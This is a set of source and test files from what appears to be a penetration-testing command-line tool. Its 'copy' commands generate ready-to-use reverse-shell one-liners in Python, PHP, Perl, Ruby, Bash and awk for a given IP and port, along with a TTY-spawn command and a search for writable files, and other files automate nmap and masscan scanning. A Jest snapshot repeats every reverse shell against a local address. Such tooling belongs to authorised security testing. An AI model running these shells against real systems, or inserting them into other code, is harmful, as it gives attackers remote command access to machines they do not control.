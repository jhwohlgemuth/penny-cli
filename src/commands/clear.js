import Conf from 'conf';
import {debug} from '../utils';
import {projectName} from '../cli';

const store = new Conf({projectName});
const makeKey = ip => ip.split('.').join('_');

export default {
    all: [{
        text: 'Clear all saved data',
        task: async () => {
            store.clear();
        },
        condition: () => true
    }],
    host: [{
        text: 'Clear data for single host',
        task: async ({ip}) => {
            const key = makeKey(ip);
            const data = store.get(key);
            await debug(data, `Clear data for ${ip}`);
            store.delete(key);
        },
        condition: ({ip}) => store.has(makeKey(ip))
    }]
};