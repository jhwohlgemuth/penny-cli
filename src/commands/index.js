import {EOL} from 'os';
import {promisify} from 'util';
import {appendFile} from 'fs-extra';
import execa from 'execa';
import clipboard from 'clipboardy';
import commandExists from 'command-exists';

const append = promisify(appendFile);

export default {
    copy: {/* eslint-disable max-len */
        'reverse shell (python)': [
            {
                text: 'Copy Python reverse shell to clipboard',
                task: async ({ip, port}) => {
                    const cmd = `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ],
        'reverse shell (php)': [
            {
                text: 'Copy PHP reverse shell to clipboard',
                task: async ({ip, port}) => {
                    const cmd = `php -r '$sock=fsockopen("${ip}",${port});exec("/bin/sh -i <&3 >&3 2>&3");'`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ],
        'reverse shell (perl)': [
            {
                text: 'Copy Perl reverse shell to clipboard',
                task: async ({ip, port}) => {
                    const cmd = `perl -e 'use Socket;$i="${ip}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ],
        'reverse shell (ruby)': [
            {
                text: 'Copy Ruby reverse shell to clipboard',
                task: async ({ip, port}) => {
                    const cmd = `ruby -rsocket -e'f=TCPSocket.open("${ip}",${port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ],
        'reverse shell (bash)': [
            {
                text: 'Copy Bash reverse shell to clipboard',
                task: async ({ip, port}) => {
                    const cmd = `bash -i >& /dev/tcp/${ip}/${port} 0>&1`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ],
        'reverse shell (awk)': [
            {
                text: 'Copy awk reverse shell to clipboard',
                task: async ({ip, port}) => {
                    const cmd = `awk 'BEGIN {s = "/inet/tcp/0/${ip}/${port}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ],
        'spawn a TTY shell (linux)': [
            {
                text: 'Copy command to clipboard',
                task: async () => {
                    const cmd = `python -c 'import pty;pty.spawn("/bin/bash")`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ],
        'find files/folders with write access (linux)': [
            {
                text: 'Copy command to clipboard',
                task: async () => {
                    const cmd = `find / -path /proc -prune -o '(' -type f -or -type d ')' '(' '(' -user  www-data -perm -u=w ')' -or '(' -group www-data -perm -g=w ')' -or '(' -perm -o=w ')' ')' -print 2> /dev/null`;
                    await clipboard.write(cmd);
                },
                condition: () => true
            }
        ]
    }, /* eslint-enable max-len */
    scan: {
        port: [
            {
                text: 'Scan TCP ports with nmap',
                task: async () => {

                },
                condition: () => true,
                optional: () => commandExists.sync('nmap')
            },
            {
                text: 'You need to install nmap to scan a port...',
                task: async () => {},
                condition: () => false,
                optional: () => !commandExists.sync('nmap')
            }

        ],
        ports: [
            {
                text: 'Scan TCP ports with masscan',
                task: async () => {

                },
                condition: () => true,
                optional: () => commandExists.sync('masscan')
            },
            {
                text: 'Scan TCP ports with nmap',
                task: async ({ip}) => {
                    const {stdout} = await execa('nmap', [ip]);
                    const ports = stdout
                        .split(EOL)
                        .filter(line => line.includes('/tcp'))
                        .map(line => line.split('/')[0]);
                    for (const port of ports) {
                        const cmd = await execa('nmap', [ip, '-p', port, '-A']);
                        await append('results.txt', cmd.stdout);
                    }
                },
                condition: () => true,
                optional: () => commandExists.sync('nmap')
            },
            {
                text: 'You need to install masscan or nmap to run a scan...',
                task: async () => {},
                condition: () => false,
                optional: () => !(commandExists.sync('masscan') || commandExists.sync('nmap'))
            }
        ]
    },
    enum: {
        web: [

        ],
        snmp: [

        ],
        smb: [

        ],
        smtp: [

        ]
    }
};