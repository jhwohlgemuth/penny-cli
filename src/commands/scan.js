import {EOL} from 'os';
import execa from 'execa';
import Conf from 'conf';
import commandExists from 'command-exists';
import {
    debug,
    getOpenPortsWithNmap,
    getOpenPortsWithMasscan
} from '../utils';

const store = new Conf({
    projectName: 'pwngoal'
});

const PRIMARY_SCANNER = 'masscan';
const SECONDARY_SCANNER = 'nmap';

export default {
    port: [
        {
            text: 'Scan TCP ports with nmap',
            task: async () => {

            },
            condition: () => true,
            optional: () => commandExists.sync('nmap')
        },
        {
            text: 'You need to install nmap to scan a port...',
            task: async () => {},
            condition: () => false,
            optional: () => !commandExists.sync('nmap')
        }

    ],
    ports: [
        {
            text: 'Clear saved data',
            task: async ({ip}) => {
                store.delete(ip);
            },
            condition: () => true
        },
        {
            text: `Find open ports with ${PRIMARY_SCANNER}`,
            task: async ({ip}) => {
                const ports = await getOpenPortsWithMasscan(ip);
                store.set('tcp.ports', ports);
                await debug(`Ports from ${PRIMARY_SCANNER}:`);
                await debug({ports});
            },
            condition: () => commandExists.sync(PRIMARY_SCANNER),
            optional: () => commandExists.sync(PRIMARY_SCANNER)
        },
        {
            text: `Find open ports with ${SECONDARY_SCANNER}`,
            task: async ({ip}) => {
                const ports = await getOpenPortsWithNmap(ip);
                store.set('tcp.ports', ports);
                await debug(`Ports from ${SECONDARY_SCANNER}:`);
                await debug({ports});
            },
            condition: () => commandExists.sync(SECONDARY_SCANNER) && !commandExists.sync(PRIMARY_SCANNER),
            optional: () => commandExists.sync(SECONDARY_SCANNER) && !commandExists.sync(PRIMARY_SCANNER)
        },
        {
            text: 'Enumerate services with nmap',
            task: async ({ip}) => {
                const data = [];
                const ports = store.get('tcp.ports') || [];
                await debug({ports});
                for (const port of ports) {
                    const {stdout} = await execa('nmap', [ip, '-p', port, '-sV']);
                    stdout
                        .split(EOL)
                        .filter(line => line.includes('/tcp'))
                        .map(line => line.split(' ').filter(Boolean))
                        .forEach(([,, service, ...version]) => {
                            data.push({port, service, version: version.join(' ')});
                        });
                }
                store.set(ip, data);
                await debug({data});
            },
            condition: () => commandExists.sync('nmap'),
            optional: () => commandExists.sync('nmap')
        },
        {
            text: 'You need to install masscan or nmap to run a scan...',
            task: async () => {},
            condition: () => false,
            optional: () => !(commandExists.sync(PRIMARY_SCANNER) || commandExists.sync(SECONDARY_SCANNER))
        }
    ]
};