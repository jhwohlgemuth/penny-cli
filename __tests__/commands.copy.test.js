import clipboard from 'clipboardy';
import commands from '../src/commands';

jest.mock('clipboardy', () => ({
    write: jest.fn()
}));

describe('copy commands', () => {
    test('can copy various strings to the clipboard', async () => {
        const options = {
            ip: '127.0.0.1',
            port: 4444
        };
        for (let [choice, [{task, condition}]] of Object.entries(commands.copy)) {
            await task(options);
            expect(choice).toMatchSnapshot();
            expect(condition()).toEqual(true);
        }
        expect(clipboard.write.mock.calls).toMatchSnapshot();
    });
});