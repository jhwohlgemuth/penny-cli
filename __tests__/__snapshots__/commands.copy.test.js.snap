// Jest Snapshot v1, https://goo.gl/fbAQLP

exports[`copy commands can copy various escaped strings to the clipboard 1`] = `
Array [
  Array [
    "\\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\"127.0.0.1\\\\\\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\\\\\"/bin/bash\\\\\\")'\\"",
  ],
  Array [
    "\\"php -r '$sock=fsockopen(\\\\\\"127.0.0.1\\\\\\",4444);exec(\\\\\\"/bin/sh -i <&3 >&3 2>&3\\\\\\");'\\"",
  ],
  Array [
    "\\"perl -e 'use Socket;$i=\\\\\\"127.0.0.1\\\\\\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\\\\"tcp\\\\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\\\\">&S\\\\\\");open(STDOUT,\\\\\\">&S\\\\\\");open(STDERR,\\\\\\">&S\\\\\\");exec(\\\\\\"/bin/sh -i\\\\\\");};'\\"",
  ],
  Array [
    "\\"ruby -rsocket -e'f=TCPSocket.open(\\\\\\"127.0.0.1\\\\\\",4444).to_i;exec sprintf(\\\\\\"/bin/sh -i <&%d >&%d 2>&%d\\\\\\",f,f,f)'\\"",
  ],
  Array [
    "\\"bash -i >& /dev/tcp/127.0.0.1/4444 0>&1\\"",
  ],
  Array [
    "\\"awk 'BEGIN {s = \\\\\\"/inet/tcp/0/127.0.0.1/4444\\\\\\"; while(42) { do{ printf \\\\\\"shell>\\\\\\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \\\\\\"exit\\\\\\") close(s); }}' /dev/null\\"",
  ],
  Array [
    "\\"python -c 'import pty;pty.spawn(\\\\\\"/bin/bash\\\\\\")\\"",
  ],
  Array [
    "\\"find / -path /proc -prune -o '(' -type f -or -type d ')' '(' '(' -user USER -perm -u=w ')' -or '(' -group GROUP -perm -g=w ')' -or '(' -perm -o=w ')' ')' -print 2> /dev/null\\"",
  ],
]
`;

exports[`copy commands can copy various strings to the clipboard 1`] = `"reverse shell (python)"`;

exports[`copy commands can copy various strings to the clipboard 2`] = `"reverse shell (php)"`;

exports[`copy commands can copy various strings to the clipboard 3`] = `"reverse shell (perl)"`;

exports[`copy commands can copy various strings to the clipboard 4`] = `"reverse shell (ruby)"`;

exports[`copy commands can copy various strings to the clipboard 5`] = `"reverse shell (bash)"`;

exports[`copy commands can copy various strings to the clipboard 6`] = `"reverse shell (awk)"`;

exports[`copy commands can copy various strings to the clipboard 7`] = `"spawn a TTY shell (linux)"`;

exports[`copy commands can copy various strings to the clipboard 8`] = `"find files/folders with write access (linux)"`;

exports[`copy commands can copy various strings to the clipboard 9`] = `
Array [
  Array [
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"127.0.0.1\\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"/bin/bash\\")'",
  ],
  Array [
    "php -r '$sock=fsockopen(\\"127.0.0.1\\",4444);exec(\\"/bin/sh -i <&3 >&3 2>&3\\");'",
  ],
  Array [
    "perl -e 'use Socket;$i=\\"127.0.0.1\\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\"tcp\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\">&S\\");open(STDOUT,\\">&S\\");open(STDERR,\\">&S\\");exec(\\"/bin/sh -i\\");};'",
  ],
  Array [
    "ruby -rsocket -e'f=TCPSocket.open(\\"127.0.0.1\\",4444).to_i;exec sprintf(\\"/bin/sh -i <&%d >&%d 2>&%d\\",f,f,f)'",
  ],
  Array [
    "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
  ],
  Array [
    "awk 'BEGIN {s = \\"/inet/tcp/0/127.0.0.1/4444\\"; while(42) { do{ printf \\"shell>\\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \\"exit\\") close(s); }}' /dev/null",
  ],
  Array [
    "python -c 'import pty;pty.spawn(\\"/bin/bash\\")",
  ],
  Array [
    "find / -path /proc -prune -o '(' -type f -or -type d ')' '(' '(' -user USER -perm -u=w ')' -or '(' -group GROUP -perm -g=w ')' -or '(' -perm -o=w ')' ')' -print 2> /dev/null",
  ],
]
`;
